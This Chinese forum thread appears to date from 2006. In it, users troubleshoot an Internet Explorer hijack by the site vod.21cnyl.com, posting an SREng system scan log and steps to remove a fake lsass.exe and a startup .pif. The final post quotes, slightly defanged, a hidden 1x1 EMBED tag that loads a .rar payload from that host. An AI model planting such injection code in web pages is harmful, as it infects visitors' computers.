如题
新世纪娱乐网 每次一打开IE就会弹到这个上面
然后开始唱“就让秋风带走我的思念 带走我的泪”...
重装了三次还是这样...
http://vod.21cnyl.com/index.htm千万别去．．．．新世纪娱乐网．．．
关掉它了就会弹出激情视频...再关掉就是成人电影...大家帮帮忙啊
我是在宿舍有一次忘了关电脑
后来回来了从此开始受到这个困扰

真得很可怕啊...
那秋风不回来现在我一听到就全身发抖...
高手帮忙啊...红夜鬼哥哥...

请下载SREng2（最新版） ，使用“智能扫描”，按下“扫描”按钮进行扫描，
扫描完成后按下“保存报告”按钮保存报告日志文件（SREng.LOG），把保存的报告
日志文件内容复制-粘贴上来,,日志一次粘不完，分次粘完，请不要修改。

下载地址
http://www.kztechs.com/sreng/sreng2.zip

2006-12-14,23:00:59

System Repair Engineer 2.2.6.605
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600)
- 管理权限用户 - 完整功能

以下内容被选中：
    所有的启动项目（包括注册表、启动文件夹、服务等）
    浏览器加载项
    正在运行的进程（包括进程模块信息）
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Corporation]
    <bgswitch><C:\WINDOWS\system32\bgswitch.exe>  [N/A]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <SoundMan><SOUNDMAN.EXE>  [(Verified)Avance Logic, Inc.]
    <IgfxTray><C:\WINDOWS\system32\igfxtray.exe>  [(Verified)Intel Corporation]
    <HotKeysCmds><C:\WINDOWS\system32\hkcmd.exe>  [(Verified)Intel Corporation]
    <runeip><C:\Program Files\Rising\AntiSpyware\runiep.exe>  [Beijing Rising Technology Co., Ltd.]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    <KKDelay><C:\Program Files\Rising\AntiSpyware\RunOnce.exe>  [Beijing Rising Technology Co., Ltd.]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Corporation]
    <Userinit><C:\WINDOWS\system32\userinit.exe,>  [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Corporation]

==================================
启动文件夹
[~]
  <C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\~.pif -->  [N/A]><N>

==================================
服务
[huawei-3com EAD appendix service / H3C_EAD_APX_SVR]
  <C:\Program Files\Huawei-3Com\H3C 认证客户端\eadApxSvr.exe -startService ><N/A>
[huawei-3com protocol authentication service manage center / H3C_SVR_MNG_SERVICE]
  <C:\Program Files\Huawei-3Com\H3C 认证客户端\AuthenMngService.exe -startService ><N/A>
[Human Interface Device Access / HidServ]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[InstallDriver Table Manager / IDriverT]
  <"C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe"><Macrovision Corporation>
[iPodService / iPodService]
  <C:\Program Files\iPod\bin\iPodService.exe><Apple Computer, Inc.>
[Windows Media Connect Service / WMConnectCDS]
  <C:\Program Files\Windows Media Connect 2\wmccds.exe><Microsoft Corporation>

==================================
驱动程序
[Service for Avance AC97 Audio (WDM) / ALCXWDM]
  <system32\drivers\ALCXWDM.SYS><Avance Logic, Inc.>
[GEARAspiWDM / GEARAspiWDM]
  <System32\Drivers\GEARAspiWDM.sys><GEAR Software Inc.>
[ialm / ialm]
  <system32\DRIVERS\ialmnt5.sys><Intel Corporation>
[IdeBusDr / IdeBusDr]
  <\SystemRoot\system32\DRIVERS\IdeBusDr.sys><Intel Corporation>
[Intel(R) Ultra ATA Controller / IdeChnDr]
  <\SystemRoot\system32\DRIVERS\IdeChnDr.sys><Intel Corporation>
[KRegEx / KRegEx]
  <\??\C:\PROGRA~1\KV2006\KRegEx.sys><N/A>
[KvMemon / KvMemon]
  <\??\C:\PROGRA~1\KV2006\KvMemon.sys><N/A>
[npkcrypt / npkcrypt]
  <\??\C:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[PCAMPR5 NDIS Protocol Driver / PCAMPR5]
  <\??\C:\WINDOWS\system32\PCAMPR5.SYS><Printing Communications Assoc., Inc. (PCAUSA)>
[PCANDIS5 NDIS Protocol Driver / PCANDIS5]
  <\??\C:\WINDOWS\system32\PCANDIS5.SYS><Printing Communications Assoc., Inc. (PCAUSA)>
[PProtect / PProtect]
  <\??\C:\PROGRA~1\KV2006\PProtect.sys><N/A>
[Direct Parallel Link Driver / Ptilink]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8139/810X Family PCI Fast Ethernet NIC NT Driver / rtl8139]
  <system32\DRIVERS\RTL8139.SYS><Realtek Semiconductor Corporation>
[Secdrv / Secdrv]
  <system32\DRIVERS\secdrv.sys><N/A>
[Windows Driver Foundation - User-mode Driver Framework Platform Driver / WudfPf]
  <system32\DRIVERS\WudfPf.sys><Microsoft Corporation>

==================================

浏览器加载项
[番茄花园]
  {6096E38F-5AC1-4391-8EC4-75DFA92FB32F} <http://www.tomatolei.com, N/A>
[QQ]
  {c95fe080-8f5d-11d2-a20b-00aa003c157b} <C:\Program Files\Tencent\QQ\QQ.EXE, TENCENT>
[QQIEFloatBarCfgCmd Class]
  {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} <C:\Program Files\Tencent\QQ\QQIEHelper.dll, 深圳市腾讯计算机系统有限公司>
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[Web Browser Applet Control]
  {08B0E5C0-4FCB-11CF-AAA5-00401C608501} <C:\WINDOWS\system32\msjava.dll, Microsoft Corporation>
[Windows Media Player]
  {22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[HTML Document]
  {25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, N/A>
[DHTML Edit Control Safe for Scripting for IE5]
  {2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, Microsoft Corporation>
[QQBrowserHelperObject Class]
  {54EBD53A-9BC1-480B-966A-843A333CA162} <C:\Program Files\Tencent\QQ\QQIEHelper.dll, 深圳市腾讯计算机系统有限公司>
[Windows Media Player]
  {6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Microsoft Web 浏览器]
  {8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, Microsoft Corporation>
[卡卡上网安全助手]
  {AFF6E516-CBE5-4F8A-9C2F-38A68013E766} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[RDS.DataSpace]
  {BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, Microsoft Corporation>
[AUDIO__MP3 Moniker Class]
  {CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9a.ocx, Adobe Systems, Inc.>
[上传到QQ网络硬盘]
  <C:\Program Files\Tencent\QQ\AddToNetDisk.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
  <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ自定义面板]
  <C:\Program Files\Tencent\QQ\AddPanel.htm, N/A>
[添加到QQ表情]
  <C:\Program Files\Tencent\QQ\AddEmotion.htm, N/A>
[用QQ彩信发送该图片]
  <C:\Program Files\Tencent\QQ\SendMMS.htm, N/A>

==================================
正在运行的进程
[PID: 460][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 524][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 552][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 596][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 608][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 756][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 816][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 884][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 936][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1020][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1172][C:\WINDOWS\system32\spoolsv.exe]  [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[PID: 1368][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\WINDOWS\system32\msdmo.dll]  [N/A, N/A]
    [C:\WINDOWS\system32\ffdshow.ax]  [N/A, 1, 0, 0, 1]

[C:\Program Files\Ringz Studio\Storm Codec\Codecs\VSFilter.dll]  [Gabest, 1, 0, 0, 9]
    [C:\Program Files\Ringz Studio\Storm Codec\Codecs\TTL2Dec.dll]  [N/A, N/A]
    [C:\Program Files\WinRAR\rarext.dll]  [N/A, N/A]
[PID: 1524][C:\WINDOWS\SOUNDMAN.EXE]  [Avance Logic, Inc., 5.0.03]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 1532][C:\WINDOWS\system32\igfxtray.exe]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxdev.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxress.dll]  [Intel Corporation, 3,0,0,1773]
[PID: 1540][C:\WINDOWS\system32\hkcmd.exe]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxdev.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\WINDOWS\system32\igfxhk.dll]  [Intel Corporation, 3,0,0,1773]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3,0,0,1773]
[PID: 1548][C:\Program Files\Rising\AntiSpyware\runiep.exe]  [Beijing Rising Technology Co., Ltd., 1, 0, 1, 3]
    [C:\Program Files\Rising\AntiSpyware\iep_ctrl.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 4]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 1556][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 1936][C:\WINDOWS\system32\drivers\lsass.exe]  [N/A, N/A]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 1512][C:\WINDOWS\System32\alg.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1888][C:\Program Files\Huawei-3Com\H3C 认证客户端\H3C Client.exe]  [华为技术有限公司, CH V2.40-0130]
    [C:\WINDOWS\system32\h3c_utility.dll]  [N/A, N/A]
    [C:\WINDOWS\system32\W32N50.dll]  [Printing Communications Assoc., Inc. (PCAUSA), 5.03.16.56]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\SecurityAuth.dll]  [N/A, N/A]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\X1Face.dll]  [N/A, N/A]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\PortalFace.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 1016][C:\Program Files\Huawei-3Com\H3C 认证客户端\AuthenMngService.exe]  [N/A, N/A]
    [C:\WINDOWS\system32\h3c_utility.dll]  [N/A, N/A]
    [C:\WINDOWS\system32\W32N50.dll]  [Printing Communications Assoc., Inc. (PCAUSA), 5.03.16.56]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\SecurityAuth.dll]  [N/A, N/A]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\X1Pt.dll]  [N/A, N/A]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\PortalPt.dll]  [N/A, N/A]
    [C:\Program Files\Huawei-3Com\H3C 认证客户端\LIBEAY32.dll]  [N/A, N/A]
[PID: 1956][C:\Program Files\Tencent\QQ\QQ.exe]  [TENCENT, 0, 0, 0, 0]
    [C:\Program Files\Tencent\QQ\QQBaseClassInDll.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQHelperDll.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\BasicCtrlDll.dll]  [Tencent, 5, 0, 200, 370]
    [C:\Program Files\Tencent\QQ\RICHED20.dll]  [N/A, 9, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQAPI.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\TIMProxy.dll]  [tencent, 0, 3, 2, 4]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\Program Files\Tencent\QQ\LoginCtrl.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\npkcntc.dll]  [INCA Internet Co., Ltd., 2006, 6, 27, 1]
    [C:\Program Files\Tencent\QQ\npkpdb.dll]  [INCA Internet Co., Ltd., 2003, 10, 1, 1]
    [C:\Program Files\Tencent\QQ\QQRes.dll]  [tencent, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQMainFrame.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\CQQApplication.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\NewSkin.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\HostingMgr.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\CameraDll.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\MailSummary.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQSpace.dll]  [, 1, 0, 0, 1]
    [C:\WINDOWS\system32\msdmo.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\QQGroupMng.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\GroupLive.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\LongConnection.dll]  [tencent, 5, 0, 200, 160]
    [C:\Program Files\Tencent\QQ\QQPlugin.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\QQAllInOne.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\SCCore.dll]  [TENCENT, 2, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQCustomFace.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\UserDefinedHead.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQPet.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQConfigPlugin.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QRingMng.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\PhoneAPI.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\DialerAllinOne.dll]  [tencent, 1, 4, 0, 0]
    [C:\Program Files\Tencent\QQ\VPortal.dll]  [, 1, 0, 0, 4]
    [C:\Program Files\Tencent\QQ\QQAvatar.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\FlashAvatarDll.dll]  [, 1, 4, 0, 1]
    [C:\Program Files\Tencent\QQ\QQSysMsgMng.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\BQQApplication.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\CommercesMng.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\PersonalDesktop.dll]  [深圳市腾讯计算机系统公司QQ工作小组, 1, 0, 0, 2]
    [C:\Program Files\Tencent\QQ\GroupConnection.dll]  [Tencent, 0, 3, 3, 5]
    [C:\Program Files\Tencent\QQ\QQAddr.dll]  [深圳市腾讯计算机系统有限公司, 5, 0, 101, 240]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9a.ocx]  [Adobe Systems, Inc., 9,0,0,296]
    [C:\Program Files\Tencent\QQ\QQSceneMng.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\ImageOle.dll]  [TODO: <Company name>, 1.0.0.1]
    [C:\Program Files\Tencent\QQ\QQZip.dll]  [tencent, 0, 3, 2, 4]
    [C:\Program Files\Tencent\QQ\QQMagicFace.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Tencent\QQ\QQPhoneHelper.dll]  [腾讯科技（深圳）有限公司, 2, 1, 1, 11]
    [C:\Program Files\Tencent\QQ\QQMsgFriendMng.dll]  [N/A, N/A]
    [C:\Program Files\Tencent\QQ\QQFileTransfer.dll]  [Tencent, 0, 3, 3, 5]
[PID: 1656][C:\Program Files\Tencent\QQ\TIMPlatform.exe]  [tencent, 0, 3, 1, 8]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\Program Files\Tencent\QQ\TIMProxy.dll]  [tencent, 0, 3, 2, 4]
[PID: 1912][C:\Program Files\Internet Explorer\IEXPLORE.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9a.ocx]  [Adobe Systems, Inc., 9,0,0,296]
[PID: 1884][C:\Program Files\Rising\AntiSpyware\Ras.exe]  [Beijing Rising Technology Co., Ltd., 1, 0, 3, 6]
    [C:\Program Files\Rising\AntiSpyware\RasGui.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 19]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
    [C:\Program Files\Rising\AntiSpyware\engine.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 18]
    [C:\Program Files\Rising\AntiSpyware\zip.dll]  [rising, 13, 0, 0, 1]
[PID: 2936][C:\Program Files\WinRAR\WinRAR.exe]  [N/A, N/A]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]
[PID: 3140][C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rar$EX00.196\SREng\SREng.exe]  [Smallfrogs Studio, 2.2.6.605]
    [C:\Program Files\Rising\AntiSpyware\ieprot.dll]  [Beijing Rising Technology Co., Ltd., 1, 0, 0, 5]

==================================
文件关联
.TXT  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  OK. ["C:\WINDOWS\hh.exe" %1]
.HLP  OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1      localhost

==================================

謝謝哥哥
沙加大王賜福于眾。。。

红夜鬼哥哥帮忙啊~~~

运行SREng2,使用“启动项目”－－启动文件夹－－删除
[~]
<C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\~.pif --> [N/A]><N>

重启按F８进入安全模式下
显示隐藏文件
删除：
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\~.pif
C:\WINDOWS\system32\drivers\lsass.exe

我的遭遇跟你一样．我１月份的时候也中了这种病毒．我日他妈的，这个制造和散播病毒的人，真是孬种，不要脸，转干这些鸟事．这个病毒居然可以通过u盘传播，而且还可以感染别的盘．我气死了。我开始的时候做了三遍系统，居然还是会感染。最后，我气的买了台新电脑．买了新电脑之后，刚装的系统，居然也感染了这个病毒，我真的象是中邪了，刚买的新电脑怎么也会中病毒呢？我还打电话骂了卖电脑的，我说他们怎么给我装的系统，为什么刚装好的，又感染了病毒．我开始不知道怎么回事，因为他们装的系统是番茄家园的，我刚打开浏览器的时候，主页是番茄家园的．所以，我开始以为番茄家园网站也有这个病毒呢。所以才骂了他们．我然后呢，重新分区，把新电脑格式化了之后，也重新装了一遍系统，装了之后呢，还是感染了病毒。我真的不知道怎么好了。因为每次我装完新系统，都要从我的u盘里拿些实用软件．所以，我开始想，会不会是u盘里有病毒？我特意拿我的u盘去网吧试了下。因为网吧有还原精灵，所以，即使感染了病毒，也可以恢复的．所以，我就去了．我打开网吧的电脑，把u盘插进去．然后打开里面的文件，复制了２个文件出来．过了２分种，我打开浏览器，果然，网吧的电脑也中病毒了．这个病毒一般人是看不出来的．因为他在我的电脑上，并没有跳转我的网页，而是在浏览器右下角隐私报告的地方有显示．我点了隐私报告，里面有很多vod.21cnyl.com的加载项目．因为，我的电脑经常登陆网上银行，所以，我对这些比较敏感，我害怕他们这些隐私报告会窃取我的银行信息．因为中了他们这些病毒的时候，我上安全网站的时候，那个小锁不显示，还提示你上的安全网站有不安全的内容．之后呢，我又把我的新电脑重新分区格式化，重新做了系统．我害怕哪天再碰到这样的网站，所以，我去买了个还原卡装上了．直到现在，我还用着还原卡呢．希望有关部门能把这个制造病毒的人，抓去坐牢．看他还敢不敢用这种卑鄙的手段了．他的是个电影站，垃圾一个．全部都是色情图片．我在一个博客站上看到了他们散播病毒的方法．他们用的代码是：<Em BED src="h-t-t-p://vod.21cnyl.com/21cnyl.rar" width=1 height=1 type=application/x-shockwave-flash></Em BED>　我把http分开了，我怕会散播到论坛上．